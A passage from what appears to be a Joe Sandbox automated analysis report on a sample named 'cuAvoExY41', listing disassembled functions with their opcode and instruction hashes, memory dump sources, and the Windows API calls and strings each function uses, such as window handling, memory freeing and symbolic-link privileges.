                                                          • Opcode Fuzzy Hash: 71a7a5877c859f12c6baf7dfeb554417782f5ce12ea77346994aa101e7a8154c
                                                          • Instruction Fuzzy Hash: FDD1C571A0C3428FDB14DF28CA42B5BBBE1BF89318F08456DE885DB242D774E905DB5A
                                                          Function 00FBE9B7 Relevance: .3, Instructions: 320COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9f38c90ce791f7da29dc95f0ed2c39889668150106663a38cd1b97ace642cd45
                                                          • Instruction ID: 13d5868ffb18b9cf8d221ab85ebef8aeab0d3292fb634b8bef7ba31e26befc3f
                                                          • Opcode Fuzzy Hash: 9f38c90ce791f7da29dc95f0ed2c39889668150106663a38cd1b97ace642cd45
                                                          • Instruction Fuzzy Hash: 61E149755083958FC304CF29D89486ABFF0EF9A300F49095EF9D497352C635EA19EBA2
                                                          Function 00FC4088 Relevance: .3, Instructions: 270COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                          • Instruction ID: 64b1273ec7d91d5e607f5cb5e49d0b7ca18852f7c7d00626ee063ebd49a71053
                                                          • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                          • Instruction Fuzzy Hash: BE9167B16003478BDB25EE64DEA3FFA73D5EB90300F10092DF996C7282DA28E545E752
                                                          Function 00FC43BF Relevance: .2, Instructions: 243COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                          • Instruction ID: 6993192e7c4d5254254ef92dcd5c6f9b9042b70101127e460cf7f426962b0d81
                                                          • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                          • Instruction Fuzzy Hash: 09818D717043434BDB28DE68DEE2FBD77D0AB90304F140D2DE9868B682DA74E985B752
                                                          Function 00FD51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f752884bb891a5ff882275b165d3de348ed94c32681ccaa9c042fe28da38ba86
                                                          • Instruction ID: f67b8af36ba75ec3073882aa15329db45f34c5a12dddc259cb6c5ebe126d0f89
                                                          • Opcode Fuzzy Hash: f752884bb891a5ff882275b165d3de348ed94c32681ccaa9c042fe28da38ba86
                                                          • Instruction Fuzzy Hash: 93618932E00F0857DE389A685C91BBE3397EB52FA1F1C061BE482DF381D655DD4AB611
                                                          Function 00FD4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                          • Instruction ID: 57e1fd24961b6ca33ef82803961686c50d3a0e3d38c03cce91d8ab835fd85d06
                                                          • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                          • Instruction Fuzzy Hash: 7C516B62E04F4657DF3446288859BBF73C79B52F20F1C091BE882CB392C52AED45B391
                                                          Function 00FBEFE2 Relevance: .2, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02df90f02be67181211d74eb681e26bf4a00f8f9466863ca017d1deaf24924df
                                                          • Instruction ID: 591178d4175d945549a66baebd1cea13526046d5213fe827b3a7c91f563b18e7
                                                          • Opcode Fuzzy Hash: 02df90f02be67181211d74eb681e26bf4a00f8f9466863ca017d1deaf24924df
                                                          • Instruction Fuzzy Hash: 6951C5319083D58AC711DF29D9404AEBFF0AF9A314F4909ADE4D95B253C221DA4EEB62
                                                          Function 00FC00B7 Relevance: .1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b18d7695c7cbcfa9d0e2b9ca6343ec424f2ae5af33186f4d0415ce85c2bc6b8
                                                          • Instruction ID: 478cb3b2004b08a2651a8ee836db54e4f8fad8de72f411ee051a236251ee861a
                                                          • Opcode Fuzzy Hash: 0b18d7695c7cbcfa9d0e2b9ca6343ec424f2ae5af33186f4d0415ce85c2bc6b8
                                                          • Instruction Fuzzy Hash: D451DFB1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340DB35E959CB96
                                                          Function 00FC3E0B Relevance: .1, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                          • Instruction ID: c2c335add1b8efc9dcb513edad83d648c5499d01da6b8c6727ae43fb72940d8f
                                                          • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                          • Instruction Fuzzy Hash: C53127B1A047078FCB18DF28CC526AABBE0FB95314F00892DE485C7741C738EA0ADB91
                                                          Function 00FBE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _swprintf.LIBCMT ref: 00FBE30E
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                            • Part of subcall function 00FC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FF1030,00000200,00FBD928,00000000,?,00000050,00FF1030), ref: 00FC1DC4
                                                          • _strlen.LIBCMT ref: 00FBE32F
                                                          • SetDlgItemTextW.USER32(?,00FEE274,?), ref: 00FBE38F
                                                          • GetWindowRect.USER32(?,?), ref: 00FBE3C9
                                                          • GetClientRect.USER32(?,?), ref: 00FBE3D5
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00FBE475
                                                          • GetWindowRect.USER32(?,?), ref: 00FBE4A2
                                                          • SetWindowTextW.USER32(?,?), ref: 00FBE4DB
                                                          • GetSystemMetrics.USER32(00000008), ref: 00FBE4E3
                                                          • GetWindow.USER32(?,00000005), ref: 00FBE4EE
                                                          • GetWindowRect.USER32(00000000,?), ref: 00FBE51B
                                                          • GetWindow.USER32(00000000,00000002), ref: 00FBE58D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                          • String ID: $%s:$CAPTION$d
                                                          • API String ID: 2407758923-2512411981
                                                          • Opcode ID: 48f99f1c487cba4b1387ea04693309765f806a91a7532d6e9f67e99ced786ece
                                                          • Instruction ID: c6b8c739b5bc1276b2b51a29cf6a6cb9c79b26b4e2aa9e4bc5dc042f45ababef
                                                          • Opcode Fuzzy Hash: 48f99f1c487cba4b1387ea04693309765f806a91a7532d6e9f67e99ced786ece
                                                          • Instruction Fuzzy Hash: C1819071608341AFD720DF69CD89AABBBE9FBC9714F04091DFA84D7240D739E8059B52
                                                          Function 00FDCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 00FDCB66
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC71E
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC730
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC742
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC754
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC766
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC778
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC78A
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC79C
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC7AE
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC7C0
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC7D2
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC7E4
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC7F6
                                                          • _free.LIBCMT ref: 00FDCB5B
                                                            • Part of subcall function 00FD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?), ref: 00FD8DE2
                                                            • Part of subcall function 00FD8DCC: GetLastError.KERNEL32(?,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?,?), ref: 00FD8DF4
                                                          • _free.LIBCMT ref: 00FDCB7D
                                                          • _free.LIBCMT ref: 00FDCB92
                                                          • _free.LIBCMT ref: 00FDCB9D
                                                          • _free.LIBCMT ref: 00FDCBBF
                                                          • _free.LIBCMT ref: 00FDCBD2
                                                          • _free.LIBCMT ref: 00FDCBE0
                                                          • _free.LIBCMT ref: 00FDCBEB
                                                          • _free.LIBCMT ref: 00FDCC23
                                                          • _free.LIBCMT ref: 00FDCC2A
                                                          • _free.LIBCMT ref: 00FDCC47
                                                          • _free.LIBCMT ref: 00FDCC5F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: 983d08b6d38cf79e678c760b991af58c71d57e41bfd8ee9c58f0649b9046b3c1
                                                          • Instruction ID: 6b3554b170d1c3782a2c85c1c301819b540e88d7e2e76f85fc1c89400b3ada1d
                                                          • Opcode Fuzzy Hash: 983d08b6d38cf79e678c760b991af58c71d57e41bfd8ee9c58f0649b9046b3c1
                                                          • Instruction Fuzzy Hash: 98314031A00246AFDB21AA39DC45B5A77E7AF94360F18441BE148D7392DF75EC41EB50
                                                          Function 00FCD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindow.USER32(?,00000005), ref: 00FCD6C1
                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 00FCD6ED
                                                            • Part of subcall function 00FC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FBC116,00000000,.exe,?,?,00000800,?,?,?,00FC8E3C), ref: 00FC1FD1
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00FCD709
                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00FCD720
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00FCD734
                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00FCD75D
                                                          • DeleteObject.GDI32(00000000), ref: 00FCD764
                                                          • GetWindow.USER32(00000000,00000002), ref: 00FCD76D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                          • String ID: STATIC
                                                          • API String ID: 3820355801-1882779555
                                                          • Opcode ID: 774d2bf94ddd4e859b46fb814f7d09abb65996bddaa20712ee01968b4347457f
                                                          • Instruction ID: 173afc1eaf9394b88cfc53815851d0806b2765929d6a29cc264d4d302108f7f8
                                                          • Opcode Fuzzy Hash: 774d2bf94ddd4e859b46fb814f7d09abb65996bddaa20712ee01968b4347457f
                                                          • Instruction Fuzzy Hash: B1110A725403127BEA316A709E4BFAF7A9CBF44731F004538FA81A60C6D77DCA0567A5
                                                          Function 00FD96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00FD9705
                                                            • Part of subcall function 00FD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?), ref: 00FD8DE2
                                                            • Part of subcall function 00FD8DCC: GetLastError.KERNEL32(?,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?,?), ref: 00FD8DF4
                                                          • _free.LIBCMT ref: 00FD9711
                                                          • _free.LIBCMT ref: 00FD971C
                                                          • _free.LIBCMT ref: 00FD9727
                                                          • _free.LIBCMT ref: 00FD9732
                                                          • _free.LIBCMT ref: 00FD973D
                                                          • _free.LIBCMT ref: 00FD9748
                                                          • _free.LIBCMT ref: 00FD9753
                                                          • _free.LIBCMT ref: 00FD975E
                                                          • _free.LIBCMT ref: 00FD976C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 2df2bd081cddb4ea6fcf2cf726959c40d1150a196e1f14ffbee818cd2309dc66
                                                          • Instruction ID: 0d656ba34428b51be29bd2802983583ee8f582f82e701ba0c260c884d920c8ba
                                                          • Opcode Fuzzy Hash: 2df2bd081cddb4ea6fcf2cf726959c40d1150a196e1f14ffbee818cd2309dc66
                                                          • Instruction Fuzzy Hash: A011D775100009BFCB01EF94CC42CDD3BB7EF58390B0950A2FA088F2A2DE35DA52AB84
                                                          Function 00FD2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 322700389-393685449
                                                          • Opcode ID: a94571754020bec5c52dc0cfb2cbb526b044a3dc1e35bc74955adefee33524d3
                                                          • Instruction ID: 20f4f4c7e56de8141d0491bb8a914dd5c20529162d1b8c4d7c332ec5ff12b6ab
                                                          • Opcode Fuzzy Hash: a94571754020bec5c52dc0cfb2cbb526b044a3dc1e35bc74955adefee33524d3
                                                          • Instruction Fuzzy Hash: 43B15971D0020ADFCF25DFA4C8819AEB7B6EF14320F19455BE9016B312D739DA51EB92
                                                          Function 00FB6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB6FAA
                                                          • _wcslen.LIBCMT ref: 00FB7013
                                                          • _wcslen.LIBCMT ref: 00FB7084
                                                            • Part of subcall function 00FB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FB7AAB
                                                            • Part of subcall function 00FB7A9C: GetLastError.KERNEL32 ref: 00FB7AF1
                                                            • Part of subcall function 00FB7A9C: CloseHandle.KERNEL32(?), ref: 00FB7B00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                          • API String ID: 3122303884-3508440684
                                                          • Opcode ID: b010f9aaee71498c4eca0e897c300d1dd483ea94611a3f4f9c94ee46c4400129
                                                          • Instruction ID: e1a4eb7990e04b30793cd39c79ba2cf8ccbf30a6a3526964d39abae93000e1c7
                                                          • Opcode Fuzzy Hash: b010f9aaee71498c4eca0e897c300d1dd483ea94611a3f4f9c94ee46c4400129
                                                          • Instruction Fuzzy Hash: 1D41E7B1D08384AAEB20F7769C46FEE776C9F44354F040456FA46A7182D778AA48BF31
                                                          Function 00FC9711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00FC9736
                                                          • _wcslen.LIBCMT ref: 00FC97D6
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00FC97E5
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00FC9806
                                                          Strings
                                                          Memory Dump Source
